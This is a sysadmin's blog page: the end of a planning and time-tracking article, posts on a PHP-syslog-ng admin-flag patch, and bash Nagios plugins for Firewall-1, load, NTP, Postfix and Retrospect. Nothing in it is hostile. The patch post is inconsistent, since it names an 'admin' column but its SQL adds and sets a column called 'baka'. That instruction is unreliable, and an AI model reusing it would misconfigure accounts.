One of the downsides to Exchange is that it isn't very easy to keep track of your spent hours in a transparent manner. It allows you to create a second calendar in a separate window, but that doesn't make for easy comparison. You could also try to double-book your whole calendar for this purpose, but that would get downright messy.

Looking at the other camp, all Apple Macintosh systems come supplied with the iCal application. It is not as comprehensive as the calendar functions of Exchange, but it is definitely workable. iCal comes with most of the features you would expect, like a To Do list and the possibility to share your calendar with your colleagues. However, this requires that you set up either a .Mac account or a local WebDAV server.

A screenshot of iCal

One of the nice things about iCal is the fact that it allows you to keep multiple calendars in one window, thus making it easier to keep track of time spent on projects. In the example shown above the green calendar contains all the events I'd scheduled and the purple calendar shows how my time was really spent.

Finally, I am told that Mozilla's Sunbird software also comes with a satisfactory Calendar. So that could be a nice alternative for those wishing to stick to Linux, or who just have a dislike for the previously mentioned applications.

Keeping track of spent time

It's one thing to enter all of your planned activities into your calendar. It's another thing entirely to keep track of the time you actually spend. Keeping tabs on how you spend your days gives you the following advantages:

1. Reporting progress to management.

2. A clear view of which activities are slipping in your schedule.

3. A clear view of which work needs to get rescheduled or even reassigned to somebody else.

However, for some reason there aren't any tools available that focus on this task; at least, I haven't been able to find any. Of course there are CRM tools that allow a person to keep track of time spent on different customers, but invariably these tools don't combine this functionality with the planning possibilities that I described earlier.

As I said earlier it's perfectly possible to cram the time you spend on tasks into the same calendar that holds your personal planning, but that usually gets a bit messy (unless you use iCal). Also, I haven't found any way to create reports from these calendar tools that provide a nice comparison between time planned and time spent. So for now the best way to create a management-friendly report is still to muck about in your favorite spreadsheet program.
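
If you'd rather script your way around the spreadsheet, a minimal sketch could look like the one below. It assumes a purely hypothetical CSV export with one line per activity in the form project,planned_hours,spent_hours; adjust it to whatever your calendar tool can actually spit out.

#!/usr/bin/bash
# Minimal sketch: sum planned vs. spent hours per project from a CSV export.
# The input format (project,planned_hours,spent_hours) is an assumption.
awk -F, '
    { planned[$1] += $2; spent[$1] += $3 }
    END {
        printf "%-25s %8s %8s %8s\n", "Project", "Planned", "Spent", "Delta"
        for (p in planned)
            printf "%-25s %8.1f %8.1f %8.1f\n", p, planned[p], spent[p], spent[p] - planned[p]
    }
' hours.csv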

Regarding project planning tools

Most projects are of a much grander scale than your average workweek. There are multiple people to keep track of and each person gets assigned a number of tasks (which in turn get divided into sub-tasks and so on). You can imagine that a simple personal calendar will not do.

That's why there is specialized software like Microsoft Project for Windows or PMX for OS X. Tools like these allow you to divide a project into atomic tasks. You can assign multiple resources to each task and all tasks can be interlinked to form dependencies and such. Most tools provide professional functions like Gantt and PERT charts.

A screenshot of MS Project

Making guestimates

In the next few chapters I will ask you to make estimates regarding the time a certain task will take. Often sysadmins will be much too optimistic in their estimates, figuring that "it will take a few hours of tinkering". And it's just that kind of mindset that is detrimental to a good planning.

When making a guestimate regarding such a time frame, clearly visualize all the steps that come with the task at hand. Imagine how much time you would spend on each step in real life: computers may choose not to cooperate, colleagues may be unavailable at times and you may actually run into some difficulty while performing each step.

So. Have a good idea of how long the task will take? Good! Now double that amount and put that figure in your planning. Seriously. One colleague tells of people who multiply their original estimates by Pi and still find that their guestimates are wrong.

One simple rule applies: it is better to arrange for a lot of additional time than it is to scramble to make ends meet.

Taking the plunge

"It must be Thursday... I never could get the hang of Thursdays."

Douglas Adams ~ "The hitchhiker's guide to the galaxy"

Every beginning is a hard one and this one will be no exception. Your first task will be to gather all the little tidbits that make up your day and then to bring order to the chaos. Here are the steps you will be going through.

1. Make a list of everything you have been doing, are doing right now and will need to do sometime soon. Keep things on a general level.

2. Divide your list into two categories: projects and tasks. In most cases the difference will be that projects are things that need to be tackled in a structured manner and will take a few weeks to finish, whereas tasks can be handled quite easily.

3. Take your list of tasks and break them down into "genres". Example genres from my planning are "security", "server improvements" and "monitoring wish list". The categorized list you've made will be your To Do list. Enter it into your calendar software.

4. For each task decide when it needs to be done and make a guestimate regarding the required time. Start assigning time slots in your calendar to the execution of these activities. I usually divide my days into two parts, each of which gets completely dedicated to one activity. Be sure that you leave plenty of room in your calendar for your projects. Also leave some empty spots to allow for unforeseen circumstances.

Now proceed with the next paragraph to sort out your projects.

The big stuff: handling projects

"Once I broke my problems into small pieces I was able to carry them, just like those acorns: one at a time. ... Be like the squirrel!"

The White Stripes ~ "Little acorns"

For each of your projects go through the following loop:

1. Write a short project overview. What is it that needs to be done? When does it need to be done? Who are you doing it for? Who is helping you out?

2. Make a basic time line that tells you which milestones need to be reached in order to attain your goal. For example: if the goal is to have all your servers backed up to tape, example milestones could be "Select appropriate software/hardware solution", "Acquire software/hardware solution", "Build basic infrastructure" and "Implement backup solution". For each milestone, decide when it needs to be reached.

3. Work out each defined milestone: which granular tasks are parts of the greater whole? For instance, the phase "Select appropriate software/hardware solution" will include tasks such as "Inventory of available software/hardware", "Initial selection of solution", "Testing of initially selected solution" and so on.

4. For each of these atomic tasks, decide how much time will be needed in order to perform it. Use the tips regarding guestimates to decide on the proper figures.

5. Put all the tasks into the time line. Put them in chronological order and include the time you've estimated for each task. Once you're done you've built a basic Gantt chart.

The process of Gantt chart creation
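
For the command-line inclined, a rough sketch of that last step could look something like this. It assumes a hypothetical tasks.csv holding one task per line as task,estimated_days, already sorted in the order you intend to execute them.

#!/usr/bin/bash
# Minimal sketch: turn an ordered task list with estimates (task,days) into
# a cumulative timeline -- the bare bones of a Gantt chart.
awk -F, '
    { start = total; total += $2; printf "day %3d - %3d : %s\n", start, total, $1 }
    END { printf "total estimated duration: %d days\n", total }
' tasks.csv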

Once you are done, go over the whole project planning and verify that, given the estimated time for each task, you can still make it on time. Discuss your findings with your management so they know what you are up to and what they can expect in the future.

Inevitable, like taxes and death

"Hackers are often monumentally disorganized and sloppy about dealing with the physical world. ... [Thus] minor maintenance tasks get deferred indefinitely."

From "The new hacker's dictionary"

One of the vitally important facts about planning is that it's not a goal, but an on-going process. Now that you have made your initial planning, you're going to have to perform upkeep. Ad infinitum. The point is that things change and there's no changing that!

Projects fall behind for many different reasons. Vendors may not deliver on time, colleagues may fail to keep their promises and even you yourself may err at times. Maybe your original planning was too tight, or maybe a task is a lot more complicated than it seemed at first. All in all, your planning will need to be shifted. Depending on the project it is wise to revisit your planning at least once a week. Mark any finished tasks as such and add any delays. Not only will this help you in your daily work, but it will also give management a good idea about the overall progress of your projects.

The same goes for your personal time. Projects need rescheduling, you need to take some unexpected sick leave, or J. Random Manager decides that doing an inventory of mouse mats really does take priority over your projects. It is best to revisit your calendar on a daily basis, so you can keep an eye on your week. What will you be doing during the next few days? What should you have done during the past few days? Are you on track when it comes to your To Do list?

Final thoughts

You may think that all of this planning business seems like an awful lot of work. I would be the first to agree with you, because it is! However, as I mentioned at the start of this article: it will be well worth your time. Not only will you be spending your time in a more ordered fashion, but it will also make you look good in the eyes of management.

Drawing a parallel with the Hitchhiker's Guide to the Galaxy, you will be the "really hoopy frood, who really knows where his towel is", because when things get messy you will still be organized.


kilala.nl tags: , , ,

View or add comments (curr. 1)

Hacked admin mode into Syslog-ng

2005-11-22 11:09:00

At $CLIENT I've built a centralised logging environment based on Syslog-ng, combined with MySQL. To make anything useful out of all the data going into the database we use PHP-syslog-ng. However, I've found a bit of a flaw with that software: any account you create has the ability to add, remove or change other accounts... Which kinda makes things insecure.

So yesterday was spent teaching myself PHP and MySQL to such a degree that I'd be able to modify the guy's source code. In the end I managed to bolt on some sort of "admin-mode" which allows you to set an "admin" flag on certain user accounts (thus giving them the capabilities mentioned above).

The updated PHP files can be found in the TAR-ball in the menu of the Sysadmin section. The only thing you'll need to do to make things work is to either:

1. Re-create your databases using the dbsetup.sql script.

2. Add the "admin" column to the "users" table using the following command: ALTER TABLE users ADD COLUMN baka BOOLEAN;
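
Purely as an illustration: once that extra column is in place, you could flag an existing account as administrator straight from the shell. The database name and username below are placeholders and the column name simply follows the ALTER TABLE statement above, so adjust everything to match your own setup.

#!/usr/bin/bash
# Hypothetical example: mark an existing PHP-syslog-ng account as admin.
# The database name "syslogng", the username and the column name are all
# assumptions; change them to match your own database layout.
mysql -u root -p syslogng -e "UPDATE users SET baka = TRUE WHERE username = 'someuser';"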


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Added Nagios plugins

2005-09-11 01:00:00

I've added all the custom Nagios monitors I wrote for $CLIENT. They might come in handy for any of you. They're not beauties, but they get the job done.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Nagios and BoKS/Keon

2005-09-11 00:47:00

Major updates in the Sysadmin section! w00t!

In this case a lot of information on one of my favourite security tools and on Nagios, my new-found love on the monitoring front.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

My article on personal planning

2005-09-07 10:15:00

It has been a very long time in coming, but finally I got around to finishing version 1.0 of my tutorial/article on planning. One thing most people in IT are notoriously bad at is writing and maintaining a project planning (or their personal planning for that matter). I was originally asked by my boss at $PREV-CLIENT to write this article, but I never got around to finishing it before I left.

Aniway... It's still version 1.0, so it's still quite rough around the edges. I hope to get a whole load of reviews from friends/colleagues before submitting it to ;Login: for publication. In the meantime you guys can find it in the Sysadmin section. I hope you enjoy reading it!


kilala.nl tags: , ,

View or add comments (curr. 0)

Sysadmin toolkit

2005-08-02 15:34:00

It's been long in coming, but after years I got 'round to putting together my Sysadmin's Toolkit. Check it out on the left, for an introduction and some photographs.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Jumpstart, FLAR and console servers

2005-07-01 15:22:00

Currently at the office, so I'll make it a quick one :3

Unfortunately I've been working longer days than I should this week. I mean, it's not a horrendous amount of hours, but still I'd rather be at home relaxing. This week has seen the people in charge at $CLIENT up the prio on a centralised Jumpstart/FLAR server, which I was supposed to deliver. I was already working on it part time, but now they have me working on it full time. It's quite a lot of fun, since I get to work together with other departments within $CLIENT, thus making more friends and allies ^_^

I also had to struggle with Perle IOLan+ terminal servers this week, since we need to be able to use the serial management port on our Sun servers. Yes, admittedly these boxen do work for this purpose, but I'd rather have a proper console server instead of a piece of kit which was originally meant as a dial-in box for dumb terminals or modems. Let's just say that I dream of Cyclades.

Oh! Last Wednesday was my birthday by the way... I've hit 26 now :3 We went out for a lovely dinner at Konichi wa in Utrecht, since we wanted to try out a different Japanese restaurant for a change. I must say: their price/quality proportions are really good! If you ever are in the neighbourhood of Utrecht and feel like Japanese, head over there! They're at Mariaplaats 9. BTW, they don't just do Tepan Yaki... They also serve excellent sushi and will make you _ramen_ or _udon_ noodles if you ask nicely!!! My new favourite restaurant :9


kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_fwm

2005-07-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Basic monitor that checks if the Checkpoint Firewall-1 Management software is up and running. It checks for a number of processes and ports.

This script was quickly hacked together for my current customer, as a Q&D solution for their monitoring needs. It's no beauty, but it works. Written in ksh and tested with:

The script sends a Critical if:

A) One or more processes are not running, or

B) One or more ports are not available for connections.

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!


#!/usr/bin/bash
#
# Firewall-1 process monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 19-06-2006
# 
# Usage: ./check_fwm
#
# Description:
# This plugin determines whether the Firewall-1 management
# software is running properly. It will check the following:
# * Are all required processes running?
# * Are all the required TCP/IP ports open?
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
#
# Output:
# The script returns a CRIT when one of the criteria mentioned
# above is not matched.
#

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Firewall-1 monitor plugin for Nagios"
	echo ""
	echo "This plugin was not developed by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

check_processes()
{
	PROCESS="0"
	# PROCLIST="cpd fwd fwm cpwd cpca cpmad cplmd cpstat cpshrd cpsnmpd"
	PROCLIST="cpd fwd fwm cpwd cpca cpmad cpstat cpsnmpd"
	for PROC in `echo $PROCLIST`; do
	if [ `ps -ef | grep $PROC | grep -v grep | wc -l` -lt 1 ]; then PROCESS=1;fi
	done

	if [ $PROCESS -eq 1 ]; then 
		echo "FWM NOK - One or more processes not running"
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_ports()
{
	PORTS="0"
	PORTLIST="256 257 18183 18184 18187 18190 18191 18192 18196 18264"
	for NUM in `echo $PORTLIST`; do
	if [ `netstat -an | grep LISTEN | grep $NUM | grep -v grep | wc -l` -lt 1 ]; then PORTS=1;fi
	done

	if [ $PORTS -eq 1 ]; then 
		echo "FWM NOK - One or more TCP/IP ports not listening."
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_processes
check_ports

echo "FWM OK - Everything running like it should"
exitstatus=$STATE_OK
exit $exitstatus
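
To give the plugin a quick spin by hand before wiring it into Nagios, something along these lines should do. The path assumes the plugin lives in the same LIBEXEC directory that the script itself points at.

# Manual smoke test (run as the nagios user); an exit status of 0 means OK.
/usr/local/nagios/libexec/check_fwm
echo "exit status: $?"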

kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_load2

2005-07-01 00:00:00

This script was written at the time I was hired by KPN i-Diensten. It is reproduced/shared here with their permission.

We are currently in the process of distributing a standard set of Nagios monitoring scripts to over 300 client systems. One of the metrics we would like to monitor is the three load averages (or as Dr. Gunther calls them: the LaLaLa triplets).

Since these 300 servers aren't all alike, we are bound to run into systems with one, two, four, eight or more processors. That means there is no nice way of making one standard configuration, since you'd have to define separate LA levels for WARN and CRIT. Why? Because a quad system can take much more load than a single-core system.

One way to get around this would be by defining separate host groups, based on the amount of processors in a system. You could then define a unique check_load command for each CPU host group.

I've gone the other way around though...

My work-around for this is to replace check_load with check_load2. This script takes no command line parameters and works on the basis of standard multipliers. We are of the opinion that the number of processors multiplied by a certain factor (150%? 200%? and so on) is a good enough way to define these WARN and CRIT levels. These multipliers can easily be modified (at the top of the script) to fit what -you- think is a worrying level of activity.
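
To make that a bit more concrete: on a hypothetical four-CPU box the default factors from the script work out like this.

# Worked example with the script's default factors on a 4-CPU system.
NUMPROCS=4
echo "1-minute WARN level: `echo "$NUMPROCS * 2.00" | bc`"   # 8.00
echo "1-minute CRIT level: `echo "$NUMPROCS * 3.00" | bc`"   # 12.00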

This script was tested on Redhat ES3, Solaris 8 and Mac OS X 10.4. It should run on other versions of these OSes as well.

EDIT:

Oh! Just like my other recent Nagios scripts, check_load2 comes with a debugging option. Set $DEBUG at the top of the file to anything larger than zero and the script will dump information at various stages of its execution.


#!/usr/bin/bash
#
# CPU load monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of KPN-IS, i-Provide, the Netherlands
# Last Modified: 22-06-2006
# 
# Usage: ./check_load2
#
# Description:
#   Ethan's original version of the check_load script is very flexible.
# It allows you to specifically set WARN and CRIT levels regarding 
# the CPU load of the system you're monitoring.
#   However: flexibility is not always a good thing. Say for example that
# you want to monitor the CPU load across a few hundred of systems having
# various CPU configurations. You -could- define host groups for single, dual
# quad (and so on) processor systems and assign unique check_load command
# definitions to each group.
#   Or you could write a script which checks the amount of active CPUs and
# then makes an educated guess at the WARN and CRIT levels for the system. 
# In most cases this should really be enough. 
#
# Limitations:
# This script should work properly on all implementations of Linux, Solaris
# and Mac OS X.
#
# Output:
# Depending on the levels defined at the top of the script,
# the script returns an OK, WARN or CRIT to Nagios based on CPU load.
#
# Other notes:
#   If you ever run into problems with the script, set the DEBUG variable
# to 1. I'll need the output the script generates to do troubleshooting.
# See below for details.
#   I realise that all the debugging commands strewn throughout the script
# may make things a little harder to read. But in the end I'm sure it was
# well worth adding them. It makes troubleshooting so much easier. :3
#

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh


### DEBUGGING SETUP ###
# Cause you never know when you'll need to squash a bug or two
DEBUG="0"
DEBUGFILE="/tmp/foobar"
rm -f $DEBUGFILE


### REQUISITE NAGIOS COMMAND LINE STUFF ###

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Semi-intelligent CPU load monitor plugin for Nagios"
	echo ""
	echo "This plugin was not developed by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done


### SETTING UP THE WARN AND CRIT FACTORS ###
# Please be aware that these are -factors- and not real load average values.
# The numbers below will be multiplied by the amount of processors to come
# to the desired WARN and CRIT levels. Feel free to adjust these factors, if
# you feel the need to tweak them.

WARN_1min="2.00"
WARN_5min="1.50"
WARN_15min="1.50"
[ $DEBUG -gt 0 ] && echo "Factors: warning factors are at $WARN_1min, $WARN_5min, $WARN_15min." >> $DEBUGFILE

CRIT_1min="3.00"
CRIT_5min="2.00"
CRIT_15min="2.00"
[ $DEBUG -gt 0 ] && echo "Factors: critical factors are at $CRIT_1min, $CRIT_5min, $CRIT_15min." >> $DEBUGFILE


### DEFINING SUBROUTINES ###

function gather_procs_linux()
{
    NUMPROCS=`cat /proc/cpuinfo | grep ^processor | wc -l` 
[ $DEBUG -gt 0 ] && echo "Numprocs: Number of processors detected is $NUMPROCS." >> $DEBUGFILE
} 

function gather_procs_sunos()
{
    NUMPROCS=`/usr/bin/mpstat | grep -v CPU | wc -l` 
[ $DEBUG -gt 0 ] && echo "Numprocs: Number of processors detected is $NUMPROCS." >> $DEBUGFILE
}

function gather_procs_darwin()
{
    NUMPROCS=`/usr/bin/hostinfo | grep "Default processor set" | awk '{print $8}'` 
[ $DEBUG -gt 0 ] && echo "Numprocs: Number of processors detected is $NUMPROCS." >> $DEBUGFILE
}

function gather_load_linux()
{
    REAL_1min=`cat /proc/loadavg | awk '{print $1}'`
    REAL_5min=`cat /proc/loadavg | awk '{print $2}'`
    REAL_15min=`cat /proc/loadavg | awk '{print $3}'`
[ $DEBUG -gt 0 ] && echo "Gather_load: Detected load averages are $REAL_1min, $REAL_5min, $REAL_15min." >> $DEBUGFILE
}

function gather_load_sunos()
{
    REAL_1min=`w | grep "load average" | awk -F, '{print $4}' | awk '{print $3}'`
    REAL_5min=`w | grep "load average" | awk -F, '{print $5}'`
    REAL_15min=`w | grep "load average" | awk -F, '{print $6}'`
[ $DEBUG -gt 0 ] && echo "Gather_load: Detected load averages are $REAL_1min, $REAL_5min, $REAL_15min." >> $DEBUGFILE
}

function gather_load_darwin()
{
    REAL_1min=`sysctl -n vm.loadavg | awk '{print $1}'`
    REAL_5min=`sysctl -n vm.loadavg | awk '{print $2}'`
    REAL_15min=`sysctl -n vm.loadavg | awk '{print $3}'`
[ $DEBUG -gt 0 ] && echo "Gather_load: Detected load averages are $REAL_1min, $REAL_5min, $REAL_15min." >> $DEBUGFILE
}

function check_load()
{
    WARN="0"; CRIT="0"

    [ `echo "if(($NUMPROCS * $WARN_1min) > $REAL_1min) 0; if(($NUMPROCS * $WARN_1min) <= $REAL_1min) 1" | bc` -gt 0 ] && let WARN=$WARN+1
    [ `echo "if(($NUMPROCS * $WARN_5min) > $REAL_5min) 0; if(($NUMPROCS * $WARN_5min) <= $REAL_5min) 1" | bc` -gt 0 ] && let WARN=$WARN+1
    [ `echo "if(($NUMPROCS * $WARN_15min) > $REAL_15min) 0; if(($NUMPROCS * $WARN_15min) <= $REAL_15min) 1" | bc` -gt 0 ] && let WARN=$WARN+1
[ $DEBUG -gt 0 ] && echo "Check_load: warning levels are `echo "$NUMPROCS * $WARN_1min"|bc`, `echo "$NUMPROCS * $WARN_5min"|bc`, `echo "$NUMPROCS * $WARN_15min"|bc`," >> $DEBUGFILE

    [ `echo "if(($NUMPROCS * $CRIT_1min) > $REAL_1min) 0; if(($NUMPROCS * $CRIT_1min) <= $REAL_1min) 1" | bc` -gt 0 ] && let CRIT=$CRIT+1
    [ `echo "if(($NUMPROCS * $CRIT_5min) > $REAL_5min) 0; if(($NUMPROCS * $CRIT_5min) <= $REAL_5min) 1" | bc` -gt 0 ] && let CRIT=$CRIT+1
    [ `echo "if(($NUMPROCS * $CRIT_15min) > $REAL_15min) 0; if(($NUMPROCS * $CRIT_15min) <= $REAL_15min) 1" | bc` -gt 0 ] && let CRIT=$CRIT+1
[ $DEBUG -gt 0 ] && echo "Check_load: critical levels are `echo "$NUMPROCS * $CRIT_1min"|bc`, `echo "$NUMPROCS * $CRIT_5min"|bc`, `echo "$NUMPROCS * $CRIT_15min"|bc`," >> $DEBUGFILE

    # Check CRIT before WARN (a critical load also exceeds the warning levels)
    # and use { } instead of a subshell, so the exit actually stops the script.
    [ $CRIT -gt 0 ] && { echo "NOK: load averages are at $REAL_1min, $REAL_5min, $REAL_15min"; exit $STATE_CRITICAL; }
    [ $WARN -gt 0 ] && { echo "NOK: load averages are at $REAL_1min, $REAL_5min, $REAL_15min"; exit $STATE_WARNING; }
}

### FINALLY, THE MAIN ROUTINE ###

NUMPROCS="0"

case `uname` in
            Linux) gather_procs_linux; gather_load_linux; check_load;;
            Darwin) gather_procs_darwin; gather_load_darwin; check_load;;
            SunOS) gather_procs_sunos; gather_load_sunos; check_load;;
            *) echo "OS not supported by this check."; exit 1;;
esac

# Nothing caused us to exit early, so we're okay.
echo "OK - load averages are at $REAL_1min, $REAL_5min, $REAL_15min"
exit $STATE_OK


kilala.nl tags: , , ,

View or add comments (curr. 7)

Nagios script: check_ntp_s

2005-07-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Basic monitor that checks if the server is up and running. It checks for a process and whether the server has drifted from its higher level Stratum server.

This script was quickly hacked together for my current customer, as a Q&D solution for their monitoring needs. It's no beauty, but it works. Written in ksh and tested with:

The script sends a Critical if:

A) One or more processes are not running, or

B) The server's clock has drifted too far from its higher level Stratum server.

Requires the "check_ntp" plugin which is part of the default monitor package.
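
If you want to verify that the underlying plugin behaves before deploying this wrapper, a manual run against your upstream time source is the quickest way. The path assumes the default LIBEXEC location used in the script and the hostname is purely illustrative.

# Manual test of the stock check_ntp plugin (hostname is an example only):
/usr/local/nagios/libexec/check_ntp -H ntp0.nl.net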

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!



#!/usr/bin/bash
#
# NTP server process monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 19-06-2006
# 
# Usage: ./check_ntp_s
#
# Description:
# This plugin determines whether the Nagios client is functioning 
# properly as an NTP server. It does this by checking:
# * Are all required processes running?
# * Is the server's time up to scratch with its higher stratum server?
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
#
# Output:
# The script returns a CRIT when one of the abovementioned criteria
# is not matched.
#

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "NTP server plugin for Nagios"
	echo ""
	echo "This plugin was not developed by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

check_processes()
{
	PROCESS="0"
	if [ `ps -ef | grep xntpd | grep -v grep | grep -v nagios | wc -l` -lt 1 ]; then PROCESS=1;fi
	if [ $PROCESS -eq 1 ]; then 
		echo "NTP-S NOK - One or more processes not running"
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_time()
{
	TIME="0"
	#SERVERS="ntp0.nl.net ntp1.nl.net ntp2.nl.net"
	SERVERS="nl-ams99z-a02-01"
	for SERV in `echo $SERVERS`; do
		if [ `/usr/local/nagios/libexec/check_ntp -H $SERV | awk '{print $2}'` != "OK:" ]; then
			TIME=1
		else
			TIME=0
			break
		fi
	done
	if [ $TIME -eq 1 ]; then
		echo "NTP-S NOK - Time not in synch with higher Stratum."
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_processes
check_time

echo "NTP-S OK - Everything running like it should"
exitstatus=$STATE_OK
exit $exitstatus


kilala.nl tags: , , ,

View or add comments (curr. 1)

Nagios script: check_postfix

2005-07-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Basic monitor that checks if Postfix is up and running. It checks for a number of processes and ports.

This script was quickly hacked together for my current customer, as a Q&D solution for their monitoring needs. It's no beauty, but it works. Written in ksh and tested with:

The script sends a Critical if:

A) One or more processes are not running, or

B) One or more ports are not available for connections.

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!



#!/usr/bin/bash
#
# Postfix process monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 19-06-2006
# 
# Usage: ./check_postfix
#
# Description:
# This plugin determines whether the Postfix SMTP server
# is running properly. It will check the following:
# * Are all required processes running?
# * Are all the required TCP/IP ports open?
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
#
# Output:
# Script returns a CRIT when one of the abovementioned criteria is 
# not matched
#

# Host OS check and warning message
if [ `uname` != "SunOS" ]
then
        echo "WARNING:"
        echo "This script was originally written for use on Solaris."
        echo "You may run into some problems running it on this host."
        echo ""
        echo "Please verify that the script works before using it in a"
        echo "live environment. You can easily disable this message after"
        echo "testing the script."
        echo ""
fi

# You may have to change this, depending on where you installed your
# Nagios plugins
PATH="/usr/bin:/usr/sbin:/bin:/sbin"
LIBEXEC="/usr/local/nagios/libexec"
. $LIBEXEC/utils.sh

print_usage() {
	echo "Usage: $PROGNAME"
	echo "Usage: $PROGNAME --help"
}

print_help() {
	echo ""
	print_usage
	echo ""
	echo "Postfix monitor plugin for Nagios"
	echo ""
	echo "This plugin was not developed by the Nagios Plugin group."
	echo "Please do not e-mail them for support on this plugin, since"
	echo "they won't know what you're talking about :P"
	echo ""
	echo "For contact info, read the plugin itself..."
}

while test -n "$1" 
do
	case "$1" in
	  --help) print_help; exit $STATE_OK;;
	  -h) print_help; exit $STATE_OK;;
	  *) print_usage; exit $STATE_UNKNOWN;;
	esac
done

check_processes()
{
	PROCESS="0"
	PROCLIST="smtpd qmgr pickup master sendmail"
	for PROC in `echo $PROCLIST`; do
	if [ `ps -ef | grep $PROC | grep -v grep | wc -l` -lt 1 ]; then 
		if [ $PROC == "smtpd" ]; then
			if [ `ps -ef | grep proxymap | grep -v grep | wc -l` -lt 1 ]; then
				PROCESS=1
			else
				PROCESS=0
			fi
		else
			PROCESS=1
		fi
	fi
	done

	if [ $PROCESS -eq 1 ]; then 
		echo "SMTP-S NOK - One or more processes not running"
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_ports()
{
	PORTS="0"
	PORTLIST="25"
	for NUM in `echo $PORTLIST`; do
	if [ `netstat -an | grep LISTEN | grep $NUM | grep -v grep | wc -l` -lt 1 ]; then PORTS=1;fi
	done

	if [ $PORTS -eq 1 ]; then 
		echo "SMTP-S NOK - One or more TCP/IP ports not listening."
		exitstatus=$STATE_CRITICAL
		exit $exitstatus
	fi
}

check_processes
check_ports

echo "SMTP-S OK - Everything running like it should"
exitstatus=$STATE_OK
exit $exitstatus



kilala.nl tags: , , ,

View or add comments (curr. 0)

Nagios script: check_retro_client

2005-07-01 00:00:00

This script was written at the time I was hired by UPC / Liberty Global.

Basic monitor that checks if the Retrospect client is up and running.

This script was quickly hacked together for my current customer, as a Q&D solution for their monitoring needs. It's no beauty, but it works. Written in ksh and tested with:

The script sends a Critical if the required process is not running.

UPDATE 19/06/2006:

Cleaned up the script a bit and added some checks that are considered the Right Thing to do. Should have done this -way- earlier!



#!/usr/bin/bash
#
# Retrospect Backup Client monitor plugin for Nagios
# Written by Thomas Sluyter (nagiosATkilalaDOTnl)
# By request of DTV Labs, Liberty Global, the Netherlands
# Last Modified: 19-06-2006
# 
# Usage: ./check_retro_client
#
# Description:
# This plugin determines whether the Retrospect backup client 
# is running properly. It will check the following:
# * Are all required processes running?
#
# Limitations:
# Currently this plugin will only function correctly on Solaris systems.
#
# Output:
# The script returns a CRIT when the abovementioned criteria are
# not matched
#

# Host OS check and warning message
